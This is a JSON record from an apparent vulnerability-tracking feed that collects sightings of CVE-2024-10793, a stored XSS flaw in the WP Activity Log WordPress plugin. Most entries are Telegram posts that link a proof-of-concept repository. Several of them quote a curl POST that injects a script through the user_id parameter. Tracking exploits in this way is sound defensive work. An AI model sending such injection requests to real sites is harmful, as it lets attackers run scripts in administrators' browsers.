{"vulnerability": "cve-2024-10793", "sightings": [{"uuid": "37534dc0-442c-4454-b66f-bcffe29e3c6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113485333704615107", "content": "", "creation_timestamp": "2024-11-15T05:32:49.395723Z"}, {"uuid": "cac6e6ff-9716-456d-a969-c11ce72fea3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/747", "content": "#exploit\n1. CVE-2024-53677:\nCritical Apache Struts RCE\nhttps://github.com/TAM-K592/CVE-2024-53677-S2-067\n\n2. CVE-2024-10793:\nWP Activity Log plugin XSS\nhttps://github.com/windz3r0day/CVE-2024-10793\n\n3. CVE-2024-55875:\nKotlin HTTP XXE/SSRF\nhttps://github.com/JAckLosingHeart/CVE-2024-55875", "creation_timestamp": "2024-12-16T17:31:59.000000Z"}, {"uuid": "b9ee11af-9bcb-4ab3-bc27-391a89145eb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "seen", "source": "MISP/acd0294c-4561-4286-a04e-5c02a1c67b1f", "content": "", "creation_timestamp": "2025-09-15T13:28:32.000000Z"}, {"uuid": "4a20cc40-80dc-4439-ae4f-7975c51c372f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "seen", "source": "MISP/acd0294c-4561-4286-a04e-5c02a1c67b1f", "content": "", "creation_timestamp": "2025-09-16T03:45:03.000000Z"}, {"uuid": "274980e4-baf2-4e30-97fa-65f5c15beb4f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9059", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-10793 poc exploit\nURL\uff1ahttps://github.com/windz3r0day/CVE-2024-10793\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-11-17T18:27:26.000000Z"}, {"uuid": "a1554f56-76d3-4b39-b13c-182f334ac327", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2438", "content": "CVE-2024-10793 \n*\n\u041f\u043b\u0430\u0433\u0438\u043d WP Activity Log \u0434\u043b\u044f WordPress\n\u0425\u0440\u0430\u043d\u0438\u043c\u0430\u044f XSS \u0447\u0435\u0440\u0435\u0437 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 user_id \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0434\u043e 5.2.1\ncurl -X POST 'http://example.com/wp-admin/admin-ajax.php' \\\n     -d 'action=destroy-sessions&amp;user_id=alert(\"XSS found 1\")'", "creation_timestamp": "2024-12-19T12:45:31.000000Z"}, {"uuid": "e360dc9b-c84c-49fb-b043-2ece2e9a158a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "seen", "source": "https://t.me/cvedetector/11041", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-10793 - WordPress WP Activity Log Stored Cross-Site Scripting Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-10793 \nPublished : Nov. 15, 2024, 6:15 a.m. | 21\u00a0minutes ago \nDescription : The WP Activity Log plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user_id parameter in all versions up to, and including, 5.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page. \nSeverity: 7.2 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"15 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-15T07:43:30.000000Z"}, {"uuid": "ba7e15a1-1f6b-44b9-a5ba-fab8fca9684d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "published-proof-of-concept", "source": "https://t.me/haj3imad/20682", "content": "https://github.com/windz3r0day/CVE-2024-10793\n\nCVE-2024-10793 poc exploit\n#github #exploit", "creation_timestamp": "2024-11-18T11:45:53.000000Z"}, {"uuid": "86e5c93e-9d86-4e77-b046-dc8ea8180b88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/166371", "content": "CVE-2024-10793 \n*\n\u041f\u043b\u0430\u0433\u0438\u043d WP Activity Log \u0434\u043b\u044f WordPress\n\u0425\u0440\u0430\u043d\u0438\u043c\u0430\u044f XSS \u0447\u0435\u0440\u0435\u0437 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 user_id \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0434\u043e 5.2.1\ncurl -X POST 'http://example.com/wp-admin/admin-ajax.php' \\\n     -d 'action=destroy-sessions&amp;user_id=alert(\"XSS found 1\")'", "creation_timestamp": "2024-12-19T12:52:24.000000Z"}, {"uuid": "e36dd848-1e09-433f-b7d8-4056304e7550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "published-proof-of-concept", "source": "https://t.me/softrinx/775", "content": "CVE-2024-10793 \n*\n\u041f\u043b\u0430\u0433\u0438\u043d WP Activity Log \u0434\u043b\u044f WordPress\n\u0425\u0440\u0430\u043d\u0438\u043c\u0430\u044f XSS \u0447\u0435\u0440\u0435\u0437 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 user_id \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0434\u043e 5.2.1\ncurl -X POST 'http://example.com/wp-admin/admin-ajax.php' \\\n     -d 'action=destroy-sessions&amp;user_id=alert(\"XSS found 1\")'", "creation_timestamp": "2024-12-19T12:52:24.000000Z"}, {"uuid": "5937e959-0d66-41eb-902d-01c1080ee72d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3466", "content": "https://github.com/windz3r0day/CVE-2024-10793\n\nCVE-2024-10793 poc exploit\n#github #exploit", "creation_timestamp": "2024-11-18T11:41:57.000000Z"}, {"uuid": "b8075c70-4e1d-41d9-b7bf-d46812c6bac0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/11564", "content": "#exploit\n1. CVE-2024-53677:\nCritical Apache Struts RCE\nhttps://github.com/TAM-K592/CVE-2024-53677-S2-067\n\n2. CVE-2024-10793:\nWP Activity Log plugin XSS\nhttps://github.com/windz3r0day/CVE-2024-10793\n\n3. CVE-2024-55875:\nKotlin HTTP XXE/SSRF\nhttps://github.com/JAckLosingHeart/CVE-2024-55875", "creation_timestamp": "2024-12-17T04:11:25.000000Z"}, {"uuid": "d5818ea0-ba1c-44ce-b8c1-c88682984a92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-10793", "type": "published-proof-of-concept", "source": "https://t.me/suboxone_chatroom/1542", "content": "#exploit\n1. CVE-2024-53677:\nCritical Apache Struts RCE\nhttps://github.com/TAM-K592/CVE-2024-53677-S2-067\n\n2. CVE-2024-10793:\nWP Activity Log plugin XSS\nhttps://github.com/windz3r0day/CVE-2024-10793\n\n3. CVE-2024-55875:\nKotlin HTTP XXE/SSRF\nhttps://github.com/JAckLosingHeart/CVE-2024-55875", "creation_timestamp": "2025-01-27T07:06:33.000000Z"}]}